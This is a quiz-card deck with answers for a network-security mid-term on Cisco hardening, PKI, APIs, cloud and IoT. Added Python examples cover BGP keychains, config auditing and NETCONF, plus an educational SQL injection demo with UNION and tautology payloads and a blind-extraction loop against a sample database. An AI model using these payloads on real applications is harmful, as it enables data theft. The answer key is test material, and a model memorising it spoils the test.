Mid-Term Secure Communication (Chapter 1 - 6)
All of these answers are correct.
1. Which of the following are different STP port states? Root port Designated Nondesignated All of these answers are correct.
Parser views (or "views")
1. You have been asked to restrict users without having to create custom privilege levels. Which of the following features or functionality would you deploy to accomplish this task? Parser views (or "views") AAA profiles DAI All of these answers are correct.
Layer 2
10. CDP operates at _________ and may provide attackers information we would rather not disclose. Layer 2 Layer 3 Layer 4 Layer 7
Cisco Resilient Configuration
10. Which of the following is a feature that's intended to improve recovery time by making a secure working copy of a router or switch image and the startup configuration files (which are referred to as the primary bootset) so that they cannot be deleted by a remote user? Cisco Resilient Configuration Cisco Secure Firmware Configuration Address Space Layout Randomization (ASLR) None of these answers is correct.
IPv6 Destination Guard
11. If an attacker attempts to spoof many IPv6 destinations in a short time, the router can get overwhelmed while trying to store temporary cache entries for each destination. The ______________feature blocks data traffic from an unknown source and filters IPv6 traffic based on the destination address. It populates all active destinations into the IPv6 first-hop security binding table, and it blocks data traffic when the destination is not identified. IPv6 Destination Guard IPv6 Neighbor Cache Guard IPv6 Hop-by-hop Extension Header IPv6 Neighbor Cache Resource Starvation
Routing protocols all support a different set of cryptographic algorithms. BGP supports only HMAC-SHA1-12. (This is the statement that is not true: BGP keychains support HMAC-MD5 and HMAC-SHA1-12.)
12. BGP keychains enable keychain authentication between two BGP peers. The BGP endpoints must both comply with a keychain on one router and a password on the other router. Which of the following statements is not true regarding BGP keychains? BGP is able to use the keychain feature to implement hitless key rollover for authentication. Key rollover specification is time based, and in the event of clock skew between the peers, the rollover process is impacted. The configurable tolerance specification allows for the accept window to be extended (before and after) by that margin. This accept window facilitates a hitless key rollover for applications (for example, routing and management protocols). Routing protocols all support a different set of cryptographic algorithms. BGP supports only HMAC-SHA1-12.
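The rollover and tolerance behavior described in the card above, as an added example that is not part of the deck or of any Cisco implementation: a keychain holds keys with send and accept lifetimes, the sender always tags with the single active send key, and the receiver accepts any key whose accept window (widened by the tolerance, before and after) covers its own clock. The key names, secrets, lifetimes and the 15-second skew are constructed for the demo; the two MACs are HMAC-MD5 and HMAC-SHA1 from the standard library.

```python
import hmac
import hashlib
from dataclasses import dataclass

# Digest functions behind the two MACs the card says BGP keychains support.
ALGORITHMS = {"hmac-md5": hashlib.md5, "hmac-sha1": hashlib.sha1}

@dataclass(frozen=True)
class Key:
    key_id: int
    secret: bytes
    algorithm: str
    send_start: int    # inclusive start of the send lifetime (seconds)
    send_end: int      # exclusive end of the send lifetime
    accept_start: int  # inclusive start of the accept lifetime
    accept_end: int    # exclusive end of the accept lifetime

class Keychain:
    def __init__(self, keys, tolerance=0):
        # tolerance: seconds by which every accept window is extended before AND after
        self.keys = sorted(keys, key=lambda k: k.key_id)
        self.tolerance = tolerance

    def send_key(self, now):
        """The key whose send lifetime covers 'now' (only one should be active)."""
        for k in self.keys:
            if k.send_start <= now < k.send_end:
                return k
        return None

    def accept_keys(self, now):
        """All keys whose tolerance-widened accept lifetime covers 'now'."""
        return [k for k in self.keys
                if k.accept_start - self.tolerance <= now < k.accept_end + self.tolerance]

def mac(key, message):
    return hmac.new(key.secret, message, ALGORITHMS[key.algorithm]).digest()

def sign(chain, message, now):
    """Sender side: tag the message with the currently active send key."""
    key = chain.send_key(now)
    if key is None:
        raise RuntimeError("no active send key at this time")
    return key.key_id, mac(key, message)

def verify(chain, message, key_id, tag, now):
    """Receiver side: accept if the named key is inside an accept window and the MAC matches."""
    for key in chain.accept_keys(now):
        if key.key_id == key_id and hmac.compare_digest(mac(key, message), tag):
            return True
    return False

# Constructed keychain: key 1 is valid for the first 1000 s, key 2 for the next 1000 s.
EXAMPLE_KEYS = [
    Key(1, b"old-shared-secret", "hmac-md5", 0, 1000, 0, 1000),
    Key(2, b"new-shared-secret", "hmac-sha1", 1000, 2000, 1000, 2000),
]

def rollover_demo(sender_clock=1005, receiver_clock=990):
    """Peer A has already rolled to key 2; peer B's clock is 15 s behind.
    Returns (verified_without_tolerance, verified_with_30s_tolerance)."""
    strict = Keychain(EXAMPLE_KEYS, tolerance=0)
    tolerant = Keychain(EXAMPLE_KEYS, tolerance=30)
    msg = b"BGP UPDATE from peer A"
    key_id, tag = sign(strict, msg, sender_clock)   # send windows ignore tolerance
    return (verify(strict, msg, key_id, tag, receiver_clock),
            verify(tolerant, msg, key_id, tag, receiver_clock))

if __name__ == "__main__":
    print("strict, tolerant:", rollover_demo())   # (False, True)
```

Without tolerance the receiver, still on key 1 by its own clock, rejects the update tagged with key 2 and the session would flap; with a 30-second tolerance key 2's accept window already opened at t=970, so the same update verifies. Tolerance only widens accept windows, never the send window, which is why both peers still send with one key at a time.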
RBAC
2. The concept of _____________ is to create a set of permissions or limited access and assign that set of permissions to users or groups. Those permissions are used by individuals for their given roles, such as a role of administrator, a role of a help desk person, and so on. ABAC RBAC Dynamic groups Downloadable ACLs
All of these answers are correct.
2. Which of the following are Layer 2 best practices? Avoid using VLAN 1 anywhere, because it is a default. Administratively configure access ports as access ports so that users cannot negotiate a trunk and disable the negotiation of trunking (no Dynamic Trunking Protocol [DTP]). Turn off Cisco Discovery Protocol (CDP) on ports facing untrusted or unknown networks that do not require CDP for anything positive. (CDP operates at Layer 2 and may provide attackers information we would rather not disclose.) On a new switch, shut down all ports and assign them to a VLAN that is not used for anything else other than a parking lot. Then bring up the ports and assign correct VLANs as the ports are allocated and needed. All of these answers are correct.
Management plane, control plane, data plane
3. The Network Foundation Protection (NFP) framework is broken down into which of the following three basic planes (also called sections/areas)? Controller plane, administrative plane, management plane Management plane, control plane, administrative plane Management plane, control plane, data plane None of these answers is correct.
Dynamic ARP Inspection (DAI)
3. Which feature can protect against Address Resolution Protocol (ARP) spoofing, ARP poisoning (which is advertising incorrect IP-to-MAC-address mapping information), and resulting Layer 2 man-in-the-middle attacks? DHCP spoofing Dynamic ARP Inspection (DAI) IP Source Guard All of these answers are correct.
All of these answers are correct.
4. Which of the following are best practices for securing the management plane? Enforce password policy, including features such as maximum number of login attempts and minimum password length. Implement role-based access control (RBAC). Use AAA services, and centrally manage those services on an authentication server (such as Cisco ISE). Keep accurate time across all network devices using secure Network Time Protocol (NTP). All of these answers are correct.
CPPr is not applied to a physical interface, so regardless of the logical or physical interface on which the packets arrive, the router processor can still be protected.
4. Which of the following statements is not true? CoPP is applied to a logical control plane interface (not directly to any Layer 3 interface) so that the policy can be applied globally to the router. The benefit of CPPr is that you can rate-limit and filter this type of traffic with a more fine-toothed comb than CoPP. The host sub-interface that handles traffic to one of the physical or logical interfaces of the router is one of the sub-interfaces of CPPr. CPPr is not applied to a physical interface, so regardless of the logical or physical interface on which the packets arrive, the router processor can still be protected.
All of these answers are correct.
5. DHCP snooping is a security feature that acts like a firewall between untrusted hosts and trusted DHCP servers. Which of the following are activities performed by DHCP snooping? Validates DHCP messages received from untrusted sources and filters out invalid messages. Rate-limits DHCP traffic from trusted and untrusted sources. Builds and maintains the DHCP snooping binding database, which contains information about untrusted hosts with leased IP addresses. Utilizes the DHCP snooping binding database to validate subsequent requests from untrusted hosts. All of these answers are correct.
Routing protocol authentication is not a best practice for securing the control plane; it is a best practice to protect the management plane.
5. Which of the following statements is not true? Control Plane Protection, or CPPr, allows for a more detailed classification of traffic (more than CoPP) that is going to use the CPU for handling. The benefit of CPPr is that you can rate-limit and filter this type of traffic with a more fine-toothed comb than CoPP. Using CoPP or CPPr, you can specify which types of management traffic are acceptable at which levels. For example, you could decide and configure the router to believe that SSH is acceptable at 100 packets per second, syslog is acceptable at 200 packets per second, and so on. Routing protocol authentication is not a best practice for securing the control plane; it is a best practice to protect the management plane.
Use TCP Intercept and firewall services to reduce the risk of SYN-flood attacks; and filter (deny) packets entering from the outside that claim an internal source IP address (anti-spoofing). CoPP, CPPr and routing protocol authentication protect the control plane, not the data plane.
6. You were hired to help increase the security of a new company that just deployed network devices in two locations. You are tasked to deploy best practices to protect the data plane. Which of the following techniques and features should you consider deploying to protect the data plane? (Select all that apply.) Use TCP Intercept and firewall services to reduce the risk of SYN-flood attacks. Filter (deny) packets trying to enter your network (from the outside) that claim to have a source IP address that is from your internal network. Deploy CoPP and CPPr in firewalls and IPS systems, as well as routing protocol authentication. Configure NetFlow and NETCONF for Control Plane Protection.
Root Guard
6. Your switch might be connected to other switches that you do not manage. If you want to prevent your local switch from learning about a new root switch through one of its local ports, you can configure which of the following features? Dynamic Root Inspection Root Guard DHCP Guard Port Security A and C
All of these answers are correct.
7. Which of the following are best practices to protect the management plane and management traffic? Deploy Login Password Retry Lockout to lock out a local AAA user account after a configured number of unsuccessful attempts by the user to log in using the username that corresponds to the AAA user account. Enable role-based access control (RBAC). Use NTP to synchronize the clocks on network devices so that any logging that includes timestamps may be easily correlated. Preferably, use NTP Version 3 to leverage its ability to provide authentication for time updates. All of these answers are correct.
Dynamic ARP Inspection
7. Which of the following prevents spoofing of Layer 2 information by hosts? Dynamic ARP Inspection BPDU Guard Root Guard All of these answers are correct.
service timestamps log datetime
8. Which of the following commands enable timestamps in syslog messages? service syslog timestamps log datetime logging timestamps log datetime service timestamps log datetime None of these answers is correct.
IP Source Guard
8. Which of the following prevents spoofing of Layer 3 information by hosts? Dynamic ARP Inspection BPDU Guard IP Source Guard All of these answers are correct.
Storm Control
9. Which of the following limits the amount of broadcast or multicast traffic flowing through the switch? Root Guard BPDU Guard Storm Control DHCP snooping
Enable NTP
9. You were hired to configure all networking devices (routers, switches, firewalls, and so on) to generate syslog messages to a security information and event management (SIEM) system. Which of the following is recommended that you do on each of the infrastructure devices to make sure that the SIEM is able to correctly correlate all syslog messages? Enable OSPF. Configure the network infrastructure devices to send syslog messages in batches (at a scheduled interval). Configure the SIEM to process the syslog messages at a scheduled interval. Enable NTP.
YANG model
A YANG-based server publishes a set of YANG modules, which taken together form the system's _______________. YANG model NETCONF model RESTCONF model gRPC model
Vulnerability
A ___________ is a weakness in the system design, implementation, software, or code, or the lack of a mechanism. Vulnerability Threat Exploit None of these answers are correct.
Availability
A denial-of-service attack impacts which of the following? Integrity Availability Confidentiality None of these answers is correct.
Integrity
An attacker is able to manipulate the configuration of a router by stealing the administrator credential. This attack impacts which of the following? Integrity Session keys Encryption None of these answers is correct.
Implicit deny Need to know
An authorization policy should always implement which of the following concepts? (Select all that apply.) Implicit deny Need to know Access control debugging logs Access control filter logs
Chris's public key (Mike encrypts with the recipient's public key; only Chris's private key can decrypt it. Mike's private key is used for signing, not for encrypting to Chris.)
Assume that Mike is trying to send an encrypted email to Chris using PGP or S/MIME. What key will Mike use to encrypt the email to Chris? Chris's private key Chris's public key Mike's private key Mike's public key
D. nonegotiate
Fill in the blank for the following command to disable the ability to negotiate, even though the port is hard coded as a trunk: SW2(config-if)# switchport _____ A. disable negotiate B. negotiate-disable C. negotiate-off D. nonegotiate
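The hardening items from the cards above (Layer 2 best practices, the management-plane checklist, service timestamps, NTP, and switchport nonegotiate) as one added example that is not part of the deck: a small Python audit that parses an IOS-style running configuration and reports which items are missing per interface and globally. The sample configuration is constructed for the demo; the command prefixes it looks for are the IOS commands for each feature (aaa local authentication attempts max-fail is the Login Password Retry Lockout command), and the interface naming is an assumption.

```python
# Constructed sample switch configuration (not taken from any real device).
SAMPLE_CONFIG = """!
hostname SW2
service timestamps log datetime msec localtime show-timezone
aaa new-model
aaa local authentication attempts max-fail 5
ntp server 192.0.2.10
ip dhcp snooping
ip dhcp snooping vlan 10,20
ip arp inspection vlan 10,20
!
interface GigabitEthernet1/0/1
 description user port - hardened
 switchport access vlan 10
 switchport mode access
 switchport nonegotiate
 switchport port-security
 no cdp enable
 storm-control broadcast level 5.00
 spanning-tree portfast
 spanning-tree bpduguard enable
!
interface GigabitEthernet1/0/2
 description user port - left at defaults
 switchport mode access
!
interface GigabitEthernet1/0/24
 description uplink to unmanaged switch
 switchport mode trunk
 spanning-tree guard root
!
"""

def parse_config(text):
    """Split an IOS-style config into global lines and per-interface sub-command lists.
    Interface sub-commands are indented by one space; '!' or a column-0 line ends the block."""
    global_lines, interfaces, current = [], {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or line.startswith("!"):
            current = None
        elif line.startswith("interface "):
            current = line.split(None, 1)[1]
            interfaces[current] = []
        elif line.startswith(" ") and current is not None:
            interfaces[current].append(line.strip())
        else:
            current = None
            global_lines.append(line)
    return global_lines, interfaces

def has(lines, prefix):
    return any(l.startswith(prefix) for l in lines)

# (command prefix that must be present, finding if it is absent)
GLOBAL_CHECKS = [
    ("service timestamps log datetime", "syslog messages are not timestamped"),
    ("ntp server", "no NTP server; timestamps cannot be correlated"),
    ("aaa new-model", "AAA is not enabled"),
    ("aaa local authentication attempts max-fail", "no login retry lockout for local accounts"),
    ("ip dhcp snooping", "DHCP snooping is not enabled"),
    ("ip arp inspection vlan", "Dynamic ARP Inspection is not enabled on any VLAN"),
]
ACCESS_CHECKS = [
    ("spanning-tree bpduguard enable", "BPDU Guard not enabled"),
    ("storm-control broadcast", "broadcast storm control not enabled"),
    ("switchport port-security", "port security not enabled"),
]

def audit(text):
    """Return a list of 'where: problem' findings for the configuration text."""
    global_lines, interfaces = parse_config(text)
    findings = [f"global: {msg}" for prefix, msg in GLOBAL_CHECKS if not has(global_lines, prefix)]
    cdp_off_globally = has(global_lines, "no cdp run")
    for name, lines in interfaces.items():
        mode = next((l.split()[2] for l in lines if l.startswith("switchport mode ")), None)
        if mode not in ("access", "trunk"):
            findings.append(f"{name}: switchport mode is not hard-coded (DTP may negotiate a trunk)")
            continue
        if not has(lines, "switchport nonegotiate"):
            findings.append(f"{name}: DTP not disabled (switchport nonegotiate)")
        if not cdp_off_globally and not has(lines, "no cdp enable"):
            findings.append(f"{name}: CDP is enabled")
        if mode == "access":
            vlan = next((l.split()[3] for l in lines if l.startswith("switchport access vlan ")), "1")
            if vlan == "1":
                findings.append(f"{name}: access port is in VLAN 1")
            findings += [f"{name}: {msg}" for prefix, msg in ACCESS_CHECKS if not has(lines, prefix)]
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print(finding)
```

Run against the sample, the hardened port and the global section come back clean, the port left at defaults produces six findings (VLAN 1, DTP, CDP, BPDU Guard, storm control, port security) and the trunk to the unmanaged switch is flagged for DTP and CDP. Feed it the output of show running-config from your own switches to get the same report.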
All of these answers are correct.
Most digital certificates contain which of the following information? Serial number Signature Thumbprint (fingerprint) All of these answers are correct.
XML
NETCONF messages are encoded in a(n) _______________ structure defined by the NETCONF standard. JSON XML OWASP RESTCNF
A hypervisor
NFV nodes such as virtual routers and firewalls need which of the following components as an underlying infrastructure? A hypervisor A virtual forwarder to connect individual instances A network controller All of the answer are correct.
All of these answers are correct.
SQL injection attacks can be divided into which of the following categories? Blind SQL injection Out-of-band SQL injection In-band SQL injection None of these answers is correct. All of these answers are correct.
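An added example, not from the deck, showing two of the three categories in the card above against a throwaway SQLite database (the table and rows are constructed for the demo): in-band injection, where the query's own result set carries the attacker's data, and boolean-based blind injection, where the application only answers yes or no and the attacker infers a secret one character at a time. The out-of-band category needs the database server to make a DNS or HTTP callback and cannot be shown offline. The parameterized lookup beside the vulnerable one is the fix.

```python
import sqlite3

def make_db():
    """In-memory database with constructed sample users (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users (username, secret) VALUES (?, ?)",
                     [("alice", "s3cr3t-a"), ("bob", "s3cr3t-b"), ("carol", "s3cr3t-c")])
    return conn

def lookup_vulnerable(conn, username):
    # String building: attacker-controlled text becomes part of the SQL grammar.
    query = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(query)]

def lookup_safe(conn, username):
    # Parameterized query: the value travels separately and is never parsed as SQL.
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]

def lookup_blind(conn, username):
    # A login-style check that reveals only True/False, never data.
    query = f"SELECT 1 FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchone() is not None

# In-band (UNION-based): the result set itself returns the secrets column.
UNION_PAYLOAD = "x' UNION SELECT secret FROM users --"
# In-band (tautology): the WHERE clause becomes always true, returning every row.
TAUTOLOGY_PAYLOAD = "' OR '1'='1"

def blind_char(conn, position, candidate):
    """One boolean question: is character <position> of bob's secret == candidate?"""
    return lookup_blind(conn, f"bob' AND substr(secret,{position},1)='{candidate}' --")

def blind_extract(conn, length=8, alphabet="abcdefghijklmnopqrstuvwxyz0123456789-"):
    """Boolean-based blind injection: recover bob's secret with one query per guess."""
    out = ""
    for pos in range(1, length + 1):
        for c in alphabet:
            if blind_char(conn, pos, c):
                out += c
                break
    return out

if __name__ == "__main__":
    conn = make_db()
    print("tautology:", lookup_vulnerable(conn, TAUTOLOGY_PAYLOAD))   # every username
    print("union:", lookup_vulnerable(conn, UNION_PAYLOAD))           # every secret
    print("safe:", lookup_safe(conn, TAUTOLOGY_PAYLOAD))              # []
    print("blind:", blind_extract(conn))                              # s3cr3t-b
```

The blind path is the one to remember when a vulnerability is dismissed as harmless because "nothing is displayed": a true/false difference (or a timing difference) is enough to read the whole column, just slower.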
PSIRT (Product Security Incident Response Teams)
Software and hardware vendors may have separate teams that handle the investigation, resolution, and disclosure of security vulnerabilities in their products and services. Typically, these teams are called ________. CSIRT Coordination Center PSIRT MSSP
All of these answers are correct
The RESTCONF interface is built around a small number of standardized requests. Which of the following are requests supported by RESTCONF? GET PUT PATCH All of these answers are correct
root
The switch port that is closest to the root bridge in terms of STP path cost (that is, it receives the best BPDU on a switch) is considered the _____ port. root designated nondesignated alternative
All of these answers are correct.
There have been multiple IP tunneling mechanisms introduced throughout the years. Which of the following are examples of IP tunneling mechanisms? VXLAN STT NVGRE All of these answers are correct.
CVE (Common Vulnerabilities and Exposures) identifier.
Vulnerabilities are typically identified by a ___________. CVE CVSS PSIRT None of these answers is correct.
POST
Which of the following HTTP methods sends data to the server typically used in HTML forms and API requests? POST GET TRACE PUT
A, B, and C
Which of the following are IoT technologies? Z-Wave INSTEON LoRaWAN A and B A, B, and C None of these answers is correct.
Authentication Nonrepudiation
Which of the following are benefits of digital signatures? Authentication Nonrepudiation Encryption Hashing
Transposition, Substitution, and Polyalphabetic (Polynomial is not a cipher method).
Which of the following are examples of common methods used by ciphers? Transposition Substitution Polyalphabetic Polynomial
SHA-1, SHA-2, and MD5 (ASH-160 is not a hash function).
Which of the following are examples of hashes? ASH-160 SHA-1 SHA-2 MD5
All of these answers are correct.
Which of the following are examples of malware attack and propagation mechanisms? Master boot record infection File infector Macro infector All of these answers are correct.
All of these answers are correct.
Which of the following are examples of security mechanisms designed to preserve confidentiality? Logical and physical access controls Encryption Controlled traffic routing All of these answers are correct.
Advanced Encryption Standard (AES), Triple Data Encryption Standard (3DES), and Blowfish (DSA is a signature algorithm and ElGamal is asymmetric; neither is a symmetric block cipher).
Which of the following are examples of symmetric block cipher algorithms? Advanced Encryption Standard (AES) Triple Data Encryption Standard (3DES) DSA Blowfish ElGamal
PKCS #10 PKCS #12
Which of the following are public key standards? IPsec PKCS #10 PKCS #12 ISO33012 AES
All of these answers are correct. (STIX: Structured Threat Information eXpression; TAXII: Trusted Automated eXchange of Indicator Information; CybOX: Cyber Observable eXpression. Related standards: OpenIOC, Open Indicators of Compromise, and OpenC2, Open Command and Control.)
Which of the following are standards being developed for disseminating threat intelligence information? STIX TAXII CybOX All of these answers are correct.
Base, temporal, and environmental groups
Which of the following are the three components in CVSS? Base, temporal, and environmental groups Base, temporary, and environmental groups Basic, temporal, and environmental groups Basic, temporary, and environmental groups
The management, control, and data planes
Which of the following are the three different "planes" in traditional networking? The management, control, and data planes The authorization, authentication, and accountability planes The authentication, control, and data planes None of these answers are correct.
All of these are correct
Which of the following can be used to retrieve a network device configuration? RESTCONF NETCONF SNMP All of these are correct
PaaS (Platform as a Service)
Which of the following cloud models include all phases of the system development life cycle (SDLC) and can use application programming interfaces (APIs), website portals, or gateway software? SaaS PaaS SDLC containers None of these answers is correct.
An authorization model
Which of the following defines how access rights and permission are granted? Examples of that model include object capability, security labels, and ACLs. A mandatory access control model An authorization model An authentication model An accounting model
Authentication by knowledge
Which of the following describes the type of authentication where the user provides a secret that is only known by him or her? Authentication by password Authentication by knowledge Personal identification number (PIN) code Authentication by characteristics
FQDN (Fully Qualified Domain Name), IP address, and Public key
Which of the following entities can be found inside of a digital certificate? FQDN DNS server IP address Default gateway Public key
All of these answers are correct.
Which of the following implementations uses a key pair? PGP Digital certificates on a web server running TLS S/MIME All of these answers are correct.
DevNet
Which of the following is a Cisco resource where you can learn about network programmability and obtain sample code? APIC ACI DevNet NETCONF
requests
Which of the following is a Python package that can be used to interact with REST API? argparse requests rest_api_pkg None of these answers are correct
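The NETCONF, RESTCONF and YANG cards above (XML-encoded NETCONF messages, RESTCONF GET/PUT/PATCH, retrieving a configuration) as one added example that is not part of the deck: it builds the NETCONF get-config RPC for the ietf-interfaces YANG module, parses an rpc-reply, and derives the RESTCONF URL and media type for the same YANG path. Only the standard library is used so it runs offline; the rpc-reply and the JSON body are constructed to look like what a device running ietf-interfaces returns, the host addresses are documentation ranges, and the /restconf root (normally discovered via /.well-known/host-meta) is an assumption.

```python
import json
import xml.etree.ElementTree as ET
from urllib.parse import quote

NETCONF_NS = "urn:ietf:params:xml:ns:netconf:base:1.0"
IF_NS = "urn:ietf:params:xml:ns:yang:ietf-interfaces"

def build_get_config(message_id="101", source="running"):
    """NETCONF <get-config> RPC, filtered to the ietf-interfaces subtree."""
    rpc = ET.Element("rpc", {"xmlns": NETCONF_NS, "message-id": message_id})
    get_config = ET.SubElement(rpc, "get-config")
    ET.SubElement(ET.SubElement(get_config, "source"), source)
    subtree_filter = ET.SubElement(get_config, "filter")
    ET.SubElement(subtree_filter, "interfaces", {"xmlns": IF_NS})
    return ET.tostring(rpc, encoding="unicode")

# Constructed <rpc-reply> in the shape a device exposing ietf-interfaces would return.
SAMPLE_REPLY = """<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101">
  <data>
    <interfaces xmlns="urn:ietf:params:xml:ns:yang:ietf-interfaces">
      <interface><name>GigabitEthernet1</name><enabled>true</enabled></interface>
      <interface><name>GigabitEthernet2</name><enabled>false</enabled></interface>
    </interfaces>
  </data>
</rpc-reply>"""

# Constructed error reply (e.g. the NETCONF user lacks rights to the datastore).
SAMPLE_ERROR_REPLY = """<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="102">
  <rpc-error><error-type>application</error-type><error-tag>access-denied</error-tag></rpc-error>
</rpc-reply>"""

def parse_reply(xml_text):
    """Map interface name -> enabled flag from an rpc-reply; raise on rpc-error."""
    root = ET.fromstring(xml_text)
    if root.tag != f"{{{NETCONF_NS}}}rpc-reply":
        raise ValueError("not a NETCONF rpc-reply")
    error = root.find(f"{{{NETCONF_NS}}}rpc-error")
    if error is not None:
        raise RuntimeError("device returned rpc-error: " + (error.findtext(f"{{{NETCONF_NS}}}error-tag") or "?"))
    result = {}
    for iface in root.iter(f"{{{IF_NS}}}interface"):
        name = iface.findtext(f"{{{IF_NS}}}name")
        result[name] = iface.findtext(f"{{{IF_NS}}}enabled") == "true"
    return result

# RESTCONF: same YANG data, addressed as a URL instead of an XML subtree filter.
RESTCONF_HEADERS = {"Accept": "application/yang-data+json",
                    "Content-Type": "application/yang-data+json"}

def restconf_url(host, module, path, keys=None):
    """RESTCONF data resource URL; list entries are selected with =key, key percent-encoded."""
    url = f"https://{host}/restconf/data/{module}:{path}"
    if keys:
        url += "=" + ",".join(quote(k, safe="") for k in keys)
    return url

# Constructed body of a RESTCONF GET on one interface (keys are module-qualified).
SAMPLE_RESTCONF_BODY = '{"ietf-interfaces:interface": {"name": "GigabitEthernet1", "enabled": true}}'

def parse_restconf_interface(body):
    data = json.loads(body)["ietf-interfaces:interface"]
    return {data["name"]: data["enabled"]}

if __name__ == "__main__":
    print(build_get_config())
    print(parse_reply(SAMPLE_REPLY))
    print(restconf_url("198.51.100.1", "ietf-interfaces", "interfaces/interface", ["GigabitEthernet1/0/1"]))
    print(parse_restconf_interface(SAMPLE_RESTCONF_BODY))
```

To actually send the RESTCONF request you would pass the URL and RESTCONF_HEADERS to requests.get with auth and a CA bundle (verify=True); the NETCONF RPC goes over SSH port 830 with a library such as ncclient. Checking for rpc-error before reading data matters because a reply with an error still parses as valid XML.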
All of these answers are correct.
Which of the following is a cloud deployment model? Public cloud Community cloud Private cloud All of these answers are correct.
NIST Cybersecurity Framework
Which of the following is a collection of industry standards and best practices to help organizations manage cybersecurity risks? MITRE NIST Cybersecurity Framework ISO Cybersecurity Framework CERT/cc
OTP (One Time Pad/Password)
Which of the following is a good example of a key that is only used once? OTP ISAKMP Multifactor key None of these answers are correct
Swagger
Which of the following is a modern framework of API documentation and is now the basis of the OpenAPI Specification (OAS)? SOAP REST Swagger WSDL
OWASP (Open Web Application Security Project)
Which of the following is a nonprofit organization that leads several industry-wide initiatives to promote the security of applications and software? CERT/cc OWASP AppSec FIRST
Exploit
Which of the following is a piece of software, a tool, a technique, or a process that takes advantage of a vulnerability that leads to access, privilege escalation, loss of integrity, or denial of service on a computer system? Exploit Reverse shell Searchsploit None of these answers is correct.
X.500
Which of the following is a series of standards focused on directory services and how those directories are organized? 802.1X X.500 X.11 X.409
One-time passcode (OTP)
Which of the following is a set of characteristics that can be used to prove a subject's identity one time and one time only? One-time passcode (OTP) Out-of-band (OOB) Biometrics None of these answers is correct.
ETA
Which of the following is a solution that allows you to detect security threats in encrypted traffic without decrypting the packets? ETA ESA WSA None of these answers is correct.
Stream cipher (symmetric key)
Which of the following is a symmetric key cipher where the plaintext data to be encrypted is done a bit at a time against the bits of the key stream, also called a cipher digit stream? Asymmetric cipher Block cipher Stream cipher None of these answers is correct.
SOAP
Which of the following is a type of API that exclusively uses XML? APIC REST SOAP GraphQL
Symmetric (block cipher)
Which of the following is a type of cipher that uses the same key to encrypt and decrypt? Symmetric Asymmetric Ciphertext RSA
Community cloud
Which of the following is a type of cloud deployment model where the cloud environment is shared among different organizations? Community cloud IaaS PaaS None of these answers is correct.
XSS (cross-site scripting): the flaw is in the web application, but the injected script runs in the end user's browser.
Which of the following is a type of vulnerability where the flaw is in a web application but the attack is against an end user (client)? XXE HTML injection SQL injection XSS
All of these answers are correct.
Which of the following is a way for an attacker to perform a session hijack attack? Predicting session tokens Session sniffing Man-in-the-middle attack Man-in-the-browser attack All of these answers are correct.
Messages in the 200 range (100 range: informational; 200 range: successful transactions; 300 range: HTTP redirections; 400 range: client errors; 500 range: server errors).
Which of the following is an HTTP status code messages range related to successful HTTP transactions? Messages in the 100 range Messages in the 200 range Messages in the 400 range Messages in the 500 range
An incident
Which of the following is an adverse event that threatens business security and/or disrupts service? An incident An IPS alert A DLP alert A SIEM alert
Diffie-Hellman (DH / asymmetric)
Which of the following is an algorithm that allows two devices to negotiate and establish shared secret keying material (keys) over an untrusted network? Diffie-Hellman RSA RC4 IKE
Certificate Authority (CA)
Which of the following is an entity that creates and issues digital certificates? Certificate Registry (CR) Certificate Authentication Server (CAS) Certificate Authority (CA) None of these answers is correct.
All of these answers are correct.
Which of the following is an example of tools and methods to hack IoT devices? UART debuggers JTAG analyzers IDA Ghidra All of these answers are correct.
VXLAN Network Identifier (VNID)
Which of the following is an identifier or a tag that represents a logical segment? VXLAN Network Identifier (VNID) VXLAN Segment Identifier (VSID) ACI Network Identifier (ANID) Application Policy Infrastructure Controller (APIC)
Contiv
Which of the following is an open source project that allows you to deploy micro-segmentation policy-based services in container environments? OVS Contiv ODL All of the above
SAML (Security Assertion Markup Language)
Which of the following is an open standard for exchanging authentication and authorization data between identity providers, and is used in many single sign-on (SSO) implementations? SAML OAuth 2.0 OpenConnectID DUO Security
East-west traffic
Which of the following is network traffic between servers (virtual servers or physical servers), containers, and so on? East-west traffic North-south traffic Micro-segmentation Network Overlays
802.1X
Which of the following is not a communications protocol used in IoT environments? Zigbee INSTEON LoRaWAN 802.1X
RSA (Rivest, Shamir, Adleman)
Which of the following is not an example of a symmetric encryption algorithm? AES 3DES RC4 RSA
Ret2Libc
Which of the following is not an example of ransomware? WannaCry Petya Nyetya Bad Rabbit Ret2Libc
Threat intelligence
Which of the following is referred to as the knowledge about an existing or emerging threat to assets, including networks and systems? Exploits Vulnerabilities Threat assessment Threat intelligence
Chain of custody
Which of the following is the way you document and preserve evidence from the time that you started the cyber-forensics investigation to the time the evidence is presented in court? Chain of custody Best evidence Faraday None of these answers is correct.
All of these answers are correct.
Which of the following is true about Cisco ACI? Spine nodes interconnect leaf devices, and they can be used to establish a connection from a Cisco ACI pod to an IP network or to interconnect multiple Cisco ACI pods. Leaf switches provide the Virtual Extensible LAN (VXLAN) tunnel endpoint (VTEP) function. The APIC manages the distributed policy repository responsible for the definition and deployment of the policy-based configuration of the Cisco ACI infrastructure. All of these answers are correct.
All of these answers are correct.
Which of the following is true about SDN? SDN provides numerous benefits in the area of the management plane, in both physical switches and virtual switches. SDN changed a few things in the management, control, and data planes; however, the big change was in the control and data planes of software-based switches and routers (including virtual switches inside hypervisors). SDN is now widely adopted in data centers. All of these answers are correct.
A root certificate contains the public key of the CA.
Which of the following is true about root certificates? A root certificate contains information about the user. A root certificate contains information about the network security device. A root certificate contains the public key of the CA. Root certificates never expire.
VXLAN
Which of the following is used to create network overlays? SDN-Lane VXLAN VXWAN None of these answers are correct
A key pair is a set of two keys that work in combination with each other as a team; and if you use the public key to encrypt data using an asymmetric encryption algorithm, the corresponding private key is used to decrypt the data.
